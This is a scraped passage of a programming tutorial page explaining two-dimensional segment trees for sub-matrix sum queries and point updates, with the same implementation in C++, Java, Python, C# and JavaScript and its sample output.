constant time" }, { "code": null, "e": 24275, "s": 24211, "text": "XOR Linked List - A Memory Efficient Doubly Linked List | Set 1" }, { "code": null, "e": 24318, "s": 24275, "text": "How to design a tiny URL or URL shortener?" }, { "code": null, "e": 24343, "s": 24318, "text": "Generic Linked List in C" }, { "code": null, "e": 24381, "s": 24343, "text": "Difference between B tree and B+ tree" }, { "code": null, "e": 24413, "s": 24381, "text": "Red-Black Tree | Set 3 (Delete)" }, { "code": null, "e": 24446, "s": 24413, "text": "Skip List | Set 1 (Introduction)" }, { "code": null, "e": 24494, "s": 24446, "text": "Largest Rectangular Area in a Histogram | Set 1" }, { "code": null, "e": 24522, "s": 24494, "text": "Splay Tree | Set 1 (Search)" }, { "code": null, "e": 24560, "s": 24522, "text": "Fibonacci Heap | Set 1 (Introduction)" }, { "code": null, "e": 24596, "s": 24560, "text": "Pattern Searching using Suffix Tree" }, { "code": null, "e": 24623, "s": 24596, "text": "Delete Operation in B-Tree" }, { "code": null, "e": 24670, "s": 24623, "text": "K Dimensional Tree | Set 1 (Search and Insert)" }, { "code": null, "e": 24703, "s": 24670, "text": "Auto-complete feature using Trie" }, { "code": null, "e": 24732, "s": 24703, "text": "Some Basic Theorems on Trees" }, { "code": null, "e": 24761, "s": 24732, "text": "AVL Tree | Set 1 (Insertion)" }, { "code": null, "e": 24788, "s": 24761, "text": "Trie | (Insert and Search)" }, { "code": null, "e": 24813, "s": 24788, "text": "LRU Cache Implementation" }, { "code": null, "e": 24851, "s": 24813, "text": "Red-Black Tree | Set 1 (Introduction)" }, { "code": null, "e": 24874, "s": 24851, "text": "Introduction of B-Tree" }, { "code": null, "e": 24916, "s": 24874, "text": "Segment Tree | Set 1 (Sum of given range)" }, { "code": null, "e": 24950, "s": 24916, "text": "Agents in Artificial Intelligence" }, { "code": null, "e": 24978, "s": 24950, "text": "AVL Tree | Set 2 (Deletion)" }, { "code": null, "e": 25018, "s": 24978, "text": "Decision Tree Introduction with example" }, { "code": null, "e": 25050, "s": 25018, "text": "Red-Black Tree | Set 2 (Insert)" }, { "code": null, "e": 25086, "s": 25050, "text": "Binary Indexed Tree or Fenwick Tree" }, { "code": null, "e": 25115, "s": 25086, "text": "Disjoint Set Data Structures" }, { "code": null, "e": 25142, "s": 25115, "text": "Insert Operation in B-Tree" }, { "code": null, "e": 25162, "s": 25142, "text": "Design a Chess Game" }, { "code": null, "e": 25176, "s": 25162, "text": "Binomial Heap" }, { "code": null, "e": 25268, "s": 25176, "text": "Design a data structure that supports insert, delete, search and getRandom in constant time" }, { "code": null, "e": 25332, "s": 25268, "text": "XOR Linked List - A Memory Efficient Doubly Linked List | Set 1" }, { "code": null, "e": 25375, "s": 25332, "text": "How to design a tiny URL or URL shortener?" }, { "code": null, "e": 25400, "s": 25375, "text": "Generic Linked List in C" }, { "code": null, "e": 25438, "s": 25400, "text": "Difference between B tree and B+ tree" }, { "code": null, "e": 25470, "s": 25438, "text": "Red-Black Tree | Set 3 (Delete)" }, { "code": null, "e": 25503, "s": 25470, "text": "Skip List | Set 1 (Introduction)" }, { "code": null, "e": 25551, "s": 25503, "text": "Largest Rectangular Area in a Histogram | Set 1" }, { "code": null, "e": 25579, "s": 25551, "text": "Splay Tree | Set 1 (Search)" }, { "code": null, "e": 25617, "s": 25579, "text": "Fibonacci Heap | Set 1 (Introduction)" }, { "code": null, "e": 25653, "s": 25617, "text": "Pattern Searching using Suffix Tree" }, { "code": null, "e": 25680, "s": 25653, "text": "Delete Operation in B-Tree" }, { "code": null, "e": 25727, "s": 25680, "text": "K Dimensional Tree | Set 1 (Search and Insert)" }, { "code": null, "e": 25760, "s": 25727, "text": "Auto-complete feature using Trie" }, { "code": null, "e": 25789, "s": 25760, "text": "Some Basic Theorems on Trees" }, { "code": null, "e": 25813, "s": 25789, "text": "Difficulty Level :\nHard" }, { "code": null, "e": 26046, "s": 25813, "text": "Given a rectangular matrix M[0...n-1][0...m-1], and queries are asked to find the sum / minimum / maximum on some sub-rectangles M[a...b][e...f], as well as queries for modification of individual matrix elements (i.e M[x] [y] = p )." }, { "code": null, "e": 26297, "s": 26046, "text": "We can also answer sub-matrix queries using Two Dimensional Binary Indexed Tree.In this article, We will focus on solving sub-matrix queries using two dimensional segment tree.Two dimensional segment tree is nothing but segment tree of segment trees." }, { "code": null, "e": 26347, "s": 26297, "text": "Prerequisite : Segment Tree – Sum of given range " }, { "code": null, "e": 26896, "s": 26347, "text": "Algorithm : We will build a two-dimensional tree of segments by the following principle: 1 . In First step, We will construct an ordinary one-dimensional segment tree, working only with the first coordinate say ‘x’ and ‘y’ as constant. Here, we will not write number in inside the node as in the one-dimensional segment tree, but an entire tree of segments. 2. The second step is to combine the values of segmented trees. Assume that in second step instead of combining the elements we are combining the segment trees obtained from the step first. " }, { "code": null, "e": 27004, "s": 26896, "text": "Consider the below example. Suppose we have to find the sum of all numbers inside the highlighted red area " }, { "code": null, "e": 27195, "s": 27004, "text": "Step 1 : We will first create the segment tree of each strip of y- axis.We represent the segment tree here as an array where child node is 2n and 2n+1 where n > 0.Segment Tree for strip y=1 " }, { "code": null, "e": 27226, "s": 27195, "text": "Segment Tree for Strip y = 2 " }, { "code": null, "e": 27257, "s": 27226, "text": "Segment Tree for Strip y = 3 " }, { "code": null, "e": 27288, "s": 27257, "text": "Segment Tree for Strip y = 4 " }, { "code": null, "e": 27463, "s": 27288, "text": "Step 2: In this step, we create the segment tree for the rectangular matrix where the base node are the strips of y-axis given above.The task is to merge above segment trees." }, { "code": null, "e": 27476, "s": 27463, "text": "Sum Query : " }, { "code": null, "e": 27529, "s": 27476, "text": "Thanks to Sahil Bansal for contributing this image. " }, { "code": null, "e": 28061, "s": 27529, "text": "Processing Query : We will respond to the two-dimensional query by the following principle: first to break the query on the first coordinate, and then, when we reached some vertex of the tree of segments with the first coordinate and then we call the corresponding tree of segments on the second coordinate.This function works in time O(logn*log m), because it first descends the tree in the first coordinate, and for each traversed vertex of that tree, it makes a query from the usual tree of segments along the second coordinate." }, { "code": null, "e": 28644, "s": 28061, "text": "Modification Query :We want to learn how to modify the tree of segments in accordance with the change in the value of an element M[x] [y] = p .It is clear that the changes will occur only in those vertices of the first tree of segments that cover the coordinate x, and for the trees of the segments corresponding to them, the changes will only occur in those vertices that cover the coordinate y. Therefore, the implementation of the modification request will not be very different from the one-dimensional case, only now we first descend the first coordinate, and then the second. " }, { "code": null, "e": 28688, "s": 28644, "text": "Output for the highlighted area will be 25." }, { "code": null, "e": 28736, "s": 28688, "text": "Below is the implementation of above approach :" }, { "code": null, "e": 28740, "s": 28736, "text": "C++" }, { "code": null, "e": 28745, "s": 28740, "text": "Java" }, { "code": null, "e": 28753, "s": 28745, "text": "Python3" }, { "code": null, "e": 28756, "s": 28753, "text": "C#" }, { "code": null, "e": 28767, "s": 28756, "text": "Javascript" }, { "code": "// C++ program for implementation// of 2D segment tree.#include <bits/stdc++.h>using namespace std; // Base node of segment tree.int ini_seg[1000][1000] = { 0 }; // final 2d-segment tree.int fin_seg[1000][1000] = { 0 }; // Rectangular matrix.int rect[4][4] = { { 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 1, 7, 5, 9 }, { 3, 0, 6, 2 },}; // size of x coordinate.int size = 4; /* * A recursive function that constructs * Initial Segment Tree for array rect[][] = { }. * 'pos' is index of current node in segment * tree seg[]. 'strip' is the enumeration * for the y-axis.*/ int segment(int low, int high, int pos, int strip){ if (high == low) { ini_seg[strip][pos] = rect[strip][low]; } else { int mid = (low + high) / 2; segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip][pos] = ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]; }} /* * A recursive function that constructs * Final Segment Tree for array ini_seg[][] = { }.*/int finalSegment(int low, int high, int pos){ if (high == low) { for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = ini_seg[low][i]; } else { int mid = (low + high) / 2; finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} /** Return sum of elements in range from index* x1 to x2 . It uses the final_seg[][] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[][].*/int finalQuery(int pos, int start, int end, int x1, int x2, int node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node][pos]; } int mid = (start + end) / 2; int p1 = finalQuery(2 * pos, start, mid, x1, x2, node); int p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/int query(int pos, int start, int end, int y1, int y2, int x1, int x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } int mid = (start + end) / 2; int p1 = query(2 * pos, start, mid, y1, y2, x1, x2); int p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodes which for the given index. The following are parameters : pos --> index of current node in segment tree fin_seg[][]. x -> index of the element to be updated. val --> Value to be change at node idx*/int finalUpdate(int pos, int low, int high, int x, int val, int node){ if (low == high) { fin_seg[node][pos] = val; } else { int mid = (low + high) / 2; if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node][pos] = fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]; }} /* This function call the final update function after visiting the yth coordinate in the segment tree fin_seg[][].*/int update(int pos, int low, int high, int x, int y, int val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { int mid = (low + high) / 2; if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (int i = 1; i < size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} // Driver program to test above functionsint main(){ int pos = 1; int low = 0; int high = 3; // Call the ini_segment() to create the // initial segment tree on x- coordinate for (int strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to built the 2d segment tree. finalSegment(low, high, 1); /* Query: * To request the query for sub-rectangle y1, y2=(2, 3) x1, x2=(2, 3) * update the value of index (3, 3)=100; * To request the query for sub-rectangle y1, y2=(2, 3) x1, x2=(2, 3)*/ cout << \"The sum of the submatrix (y1, y2)->(2, 3), \" << \" (x1, x2)->(2, 3) is \" << query(1, 1, 4, 2, 3, 2, 3) << endl; // Function to update the value update(1, 1, 4, 2, 3, 100); cout << \"The sum of the submatrix (y1, y2)->(2, 3), \" << \"(x1, x2)->(2, 3) is \" << query(1, 1, 4, 2, 3, 2, 3) << endl; return 0;}", "e": 33807, "s": 28767, "text": null }, { "code": "// Java program for implementation// of 2D segment tree.import java.util.*; class GfG{ // Base node of segment tree.static int ini_seg[][] = new int[1000][1000]; // final 2d-segment tree.static int fin_seg[][] = new int[1000][1000]; // Rectangular matrix.static int rect[][] = {{ 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 1, 7, 5, 9 }, { 3, 0, 6, 2 }, }; // size of x coordinate.static int size = 4; /** A recursive function that constructs* Initial Segment Tree for array rect[][] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.*/ static void segment(int low, int high, int pos, int strip){ if (high == low) { ini_seg[strip][pos] = rect[strip][low]; } else { int mid = (low + high) / 2; segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip][pos] = ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]; }} /** A recursive function that constructs* Final Segment Tree for array ini_seg[][] = { }.*/static void finalSegment(int low, int high, int pos){ if (high == low) { for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = ini_seg[low][i]; } else { int mid = (low + high) / 2; finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} /** Return sum of elements in range from index* x1 to x2 . It uses the final_seg[][] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[][].*/static int finalQuery(int pos, int start, int end, int x1, int x2, int node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node][pos]; } int mid = (start + end) / 2; int p1 = finalQuery(2 * pos, start, mid, x1, x2, node); int p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/static int query(int pos, int start, int end, int y1, int y2, int x1, int x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } int mid = (start + end) / 2; int p1 = query(2 * pos, start, mid, y1, y2, x1, x2); int p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[][]. x ->index of the element to be updated. val -->Value to be change at node idx*/static void finalUpdate(int pos, int low, int high, int x, int val, int node){ if (low == high) { fin_seg[node][pos] = val; } else { int mid = (low + high) / 2; if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node][pos] = fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]; }} /*This function call the finalupdate function after visitingthe yth coordinate in the segmenttree fin_seg[][].*/static void update(int pos, int low, int high, int x, int y, int val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { int mid = (low + high) / 2; if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (int i = 1; i < size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} // Driver codepublic static void main(String[] args){ int pos = 1; int low = 0; int high = 3; // Call the ini_segment() to create the // initial segment tree on x- coordinate for (int strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to // built the 2d segment tree. finalSegment(low, high, 1); /*Query:* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)* update the value of index (3, 3)=100;* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)*/ System.out.println(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \" (x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)); // Function to update the value update(1, 1, 4, 2, 3, 100); System.out.println(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \"(x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)); }} // This code has been contributed by 29AjayKumar", "e": 39096, "s": 33807, "text": null }, { "code": "# Python 3 program for implementation# of 2D segment tree. # Base node of segment tree.ini_seg = [[ 0 for x in range(1000)] for y in range(1000)] # final 2d-segment tree.fin_seg = [[ 0 for x in range(1000)] for y in range(1000)] # Rectangular matrix.rect= [[ 1, 2, 3, 4 ], [ 5, 6, 7, 8 ], [ 1, 7, 5, 9 ], [ 3, 0, 6, 2 ]] # size of x coordinate.size = 4 '''* A recursive function that constructs* Initial Segment Tree for array rect[][] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.''' def segment(low, high, pos, strip): if (high == low) : ini_seg[strip][pos] = rect[strip][low] else : mid = (low + high) // 2 segment(low, mid, 2 * pos, strip) segment(mid + 1, high, 2 * pos + 1, strip) ini_seg[strip][pos] = (ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]) # A recursive function that constructs# Final Segment Tree for array ini_seg[][] = { }.def finalSegment(low, high, pos): if (high == low) : for i in range(1, 2 * size): fin_seg[pos][i] = ini_seg[low][i] else : mid = (low + high) // 2 finalSegment(low, mid, 2 * pos) finalSegment(mid + 1, high, 2 * pos + 1) for i in range( 1, 2 * size): fin_seg[pos][i] = (fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]) '''* Return sum of elements in range* from index x1 to x2 . It uses the* final_seg[][] array created using* finalsegment() function. 'pos' is* index of current node in segment* tree fin_seg[][].'''def finalQuery(pos, start, end, x1, x2, node): if (x2 < start or end < x1) : return 0 if (x1 <= start and end <= x2) : return fin_seg[node][pos] mid = (start + end) // 2 p1 = finalQuery(2 * pos, start, mid, x1, x2, node) p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node) return (p1 + p2) '''* This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.'''def query(pos, start, end, y1, y2, x1, x2): if (y2 < start or end < y1) : return 0 if (y1 <= start and end <= y2) : return (finalQuery(1, 1, 4, x1, x2, pos)) mid = (start + end) // 2 p1 = query(2 * pos, start, mid, y1, y2, x1, x2) p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2) return (p1 + p2) ''' A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[][]. x ->index of the element to be updated. val -->Value to be change at node idx'''def finalUpdate(pos, low, high, x, val, node): if (low == high) : fin_seg[node][pos] = val else : mid = (low + high) // 2 if (low <= x and x <= mid) : finalUpdate(2 * pos, low, mid, x, val, node) else : finalUpdate(2 * pos + 1, mid + 1, high, x, val, node) fin_seg[node][pos] = (fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]) # This function call the final# update function after visiting# the yth coordinate in the# segment tree fin_seg[][].def update(pos, low, high, x, y, val): if (low == high) : finalUpdate(1, 1, 4, x, val, pos) else : mid = (low + high) // 2 if (low <= y and y <= mid) : update(2 * pos, low, mid, x, y, val) else : update(2 * pos + 1, mid + 1, high, x, y, val) for i in range(1, size): fin_seg[pos][i] = (fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]) # Driver Codeif __name__ == \"__main__\": pos = 1 low = 0 high = 3 # Call the ini_segment() to create the # initial segment tree on x- coordinate for strip in range(4): segment(low, high, 1, strip) # Call the final function to built # the 2d segment tree. finalSegment(low, high, 1)''' Query: * To request the query for sub-rectangle * y1, y2=(2, 3) x1, x2=(2, 3) * update the value of index (3, 3)=100; * To request the query for sub-rectangle * y1, y2=(2, 3) x1, x2=(2, 3) '''print( \"The sum of the submatrix (y1, y2)->(2, 3), \", \"(x1, x2)->(2, 3) is \", query(1, 1, 4, 2, 3, 2, 3)) # Function to update the valueupdate(1, 1, 4, 2, 3, 100) print( \"The sum of the submatrix (y1, y2)->(2, 3), \", \"(x1, x2)->(2, 3) is \", query(1, 1, 4, 2, 3, 2, 3))", "e": 43781, "s": 39096, "text": null }, { "code": "// C# program for implementation// of 2D segment tree.using System; class GfG{ // Base node of segment tree.static int [,]ini_seg = new int[1000, 1000]; // final 2d-segment tree.static int [,]fin_seg = new int[1000, 1000]; // Rectangular matrix.static int [,]rect = {{ 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 1, 7, 5, 9 }, { 3, 0, 6, 2 }, }; // size of x coordinate.static int size = 4; /** A recursive function that constructs* Initial Segment Tree for array rect[,] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.*/ static void segment(int low, int high, int pos, int strip){ if (high == low) { ini_seg[strip, pos] = rect[strip, low]; } else { int mid = (low + high) / 2; segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip,pos] = ini_seg[strip, 2 * pos] + ini_seg[strip, 2 * pos + 1]; }} /** A recursive function that constructs* Final Segment Tree for array ini_seg[,] = { }.*/static void finalSegment(int low, int high, int pos){ if (high == low) { for (int i = 1; i < 2 * size; i++) fin_seg[pos, i] = ini_seg[low, i]; } else { int mid = (low + high) / 2; finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (int i = 1; i < 2 * size; i++) fin_seg[pos,i] = fin_seg[2 * pos, i] + fin_seg[2 * pos + 1, i]; }} /** Return sum of elements in range from index* x1 to x2 . It uses the final_seg[,] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[,].*/static int finalQuery(int pos, int start, int end, int x1, int x2, int node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node, pos]; } int mid = (start + end) / 2; int p1 = finalQuery(2 * pos, start, mid, x1, x2, node); int p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/static int query(int pos, int start, int end, int y1, int y2, int x1, int x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } int mid = (start + end) / 2; int p1 = query(2 * pos, start, mid, y1, y2, x1, x2); int p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[,]. x ->index of the element to be updated. val -->Value to be change at node idx*/static void finalUpdate(int pos, int low, int high, int x, int val, int node){ if (low == high) { fin_seg[node, pos] = val; } else { int mid = (low + high) / 2; if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node,pos] = fin_seg[node, 2 * pos] + fin_seg[node, 2 * pos + 1]; }} /*This function call the finalupdate function after visitingthe yth coordinate in the segmenttree fin_seg[,].*/static void update(int pos, int low, int high, int x, int y, int val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { int mid = (low + high) / 2; if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (int i = 1; i < size; i++) fin_seg[pos,i] = fin_seg[2 * pos, i] + fin_seg[2 * pos + 1, i]; }} // Driver codepublic static void Main(){ int pos = 1; int low = 0; int high = 3; // Call the ini_segment() to create the // initial segment tree on x- coordinate for (int strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to // built the 2d segment tree. finalSegment(low, high, 1); /*Query:* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)* update the value of index (3, 3)=100;* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)*/ Console.WriteLine(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \" (x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)); // Function to update the value update(1, 1, 4, 2, 3, 100); Console.WriteLine(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \"(x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)); }} /* This code contributed by PrinciRaj1992 */", "e": 49030, "s": 43781, "text": null }, { "code": "<script>// Javascript program for implementation// of 2D segment tree. // Base node of segment tree. let ini_seg = new Array(1000); // final 2d-segment tree. let fin_seg = new Array(1000); for(let i = 0; i < 1000; i++) { ini_seg[i] = new Array(1000); fin_seg[i] = new Array(1000); for(let j = 0; j < 1000; j++) { ini_seg[i][j] = 0; fin_seg[i][j] = 0; } } // Rectangular matrix. let rect = [[ 1, 2, 3, 4 ], [ 5, 6, 7, 8 ], [ 1, 7, 5, 9 ], [ 3, 0, 6, 2 ]]; // size of x coordinate. let size = 4; /** A recursive function that constructs* Initial Segment Tree for array rect[][] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.*/function segment(low,high,pos,strip){ if (high == low) { ini_seg[strip][pos] = rect[strip][low]; } else { let mid = Math.floor((low + high) / 2); segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip][pos] = ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]; }} /** A recursive function that constructs* Final Segment Tree for array ini_seg[][] = { }.*/function finalSegment(low,high,pos){ if (high == low) { for (let i = 1; i < 2 * size; i++) fin_seg[pos][i] = ini_seg[low][i]; } else { let mid = Math.floor((low + high) / 2); finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (let i = 1; i < 2 * size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} /** Return sum of elements in range from index* x1 to x2 . It uses the final_seg[][] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[][].*/function finalQuery(pos,start,end,x1,x2,node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node][pos]; } let mid = Math.floor((start + end) / 2); let p1 = finalQuery(2 * pos, start, mid, x1, x2, node); let p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/function query(pos,start,end,y1,y2,x1,x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } let mid = Math.floor((start + end) / 2); let p1 = query(2 * pos, start, mid, y1, y2, x1, x2); let p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[][]. x ->index of the element to be updated. val -->Value to be change at node idx*/function finalUpdate(pos,low,high,x,val,node){ if (low == high) { fin_seg[node][pos] = val; } else { let mid = Math.floor((low + high) / 2); if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node][pos] = fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]; }} /*This function call the finalupdate function after visitingthe yth coordinate in the segmenttree fin_seg[][].*/function update(pos,low,high,x,y,val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { let mid = Math.floor((low + high) / 2); if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (let i = 1; i < size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} // Driver codelet pos = 1;let low = 0;let high = 3; // Call the ini_segment() to create the// initial segment tree on x- coordinatefor (let strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to// built the 2d segment tree.finalSegment(low, high, 1); /*Query:* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)* update the value of index (3, 3)=100;* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)*/document.write(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \" (x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)+\"<br>\"); // Function to update the valueupdate(1, 1, 4, 2, 3, 100); document.write(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \"(x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)+\"<br>\"); // This code is contributed by rag2127</script>", "e": 54266, "s": 49030, "text": null }, { "code": null, "e": 54400, "s": 54266, "text": "The sum of the submatrix (y1, y2)->(2, 3), (x1, x2)->(2, 3) is 25\nThe sum of the submatrix (y1, y2)->(2, 3), (x1, x2)->(2, 3) is 118" }, { "code": null, "e": 54518, "s": 54402, "text": "Time complexity : Processing Query : O(logn*logm) Modification Query: O(2*n*logn*logm) Space Complexity : O(4*m*n) " }, { "code": null, "e": 54524, "s": 54518, "text": "ukasp" }, { "code": null, "e": 54536, "s": 54524, "text": "29AjayKumar" }, { "code": null, "e": 54550, "s": 54536, "text": "princiraj1992" }, { "code": null, "e": 54564, "s": 54550, "text": "shubham_singh" }, { "code": null, "e": 54577, "s": 54564, "text": "Akanksha_Rai" }, { "code": null, "e": 54585, "s": 54577, "text": "rag2127" }, { "code": null, "e": 54594, "s": 54585, "text": "sweetyty" }, { "code": null, "e": 54609, "s": 54594, "text": "sagar0719kumar" }, { "code": null, "e": 54629, "s": 54609, "text": "array-range-queries" }, { "code": null, "e": 54642, "s": 54629, "text": "Segment-Tree" }, { "code": null, "e": 54666, "s": 54642, "text": "Advanced Data Structure" }, { "code": null, "e": 54690, "s": 54666, "text": "Competitive Programming" }, { "code": null, "e": 54700, "s": 54690, "text": "Recursion" }, { "code": null, "e": 54719, "s": 54700, "text": "Technical Scripter" }, { "code": null, "e": 54724, "s": 54719, "text": "Tree" }, { "code": null, "e": 54734, "s": 54724, "text": "Recursion" }, { "code": null, "e": 54739, "s": 54734, "text": "Tree" }, { "code": null, "e": 54752, "s": 54739, "text": "Segment-Tree" }, { "code": null, "e": 54850, "s": 54752, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 54879, "s": 54850, "text": "Ordered Set and GNU C++ PBDS" }, { "code": null, "e": 54921, "s": 54879, "text": "2-3 Trees | (Search, Insert and Deletion)" }, { "code": null, "e": 54967, "s": 54921, "text": "Extendible Hashing (Dynamic approach to DBMS)" }, { "code": null, "e": 55003, "s": 54967, "text": "Suffix Array | Set 1 (Introduction)" }, { "code": null, "e": 55064, "s": 55003, "text": "Difference between Backtracking and Branch-N-Bound technique" }, { "code": null, "e": 55107, "s": 55064, "text": "Competitive Programming - A Complete Guide" }, { "code": null, "e": 55150, "s": 55107, "text": "Practice for cracking any coding interview" }, { "code": null, "e": 55191, "s": 55150, "text": "Arrow operator -> in C/C++ with Examples" }, { "code": null, "e": 55269, "s": 55191, "text": "Prefix Sum Array - Implementation and Applications in Competitive Programming" } ]
Binary Tree ADT in Data Structure
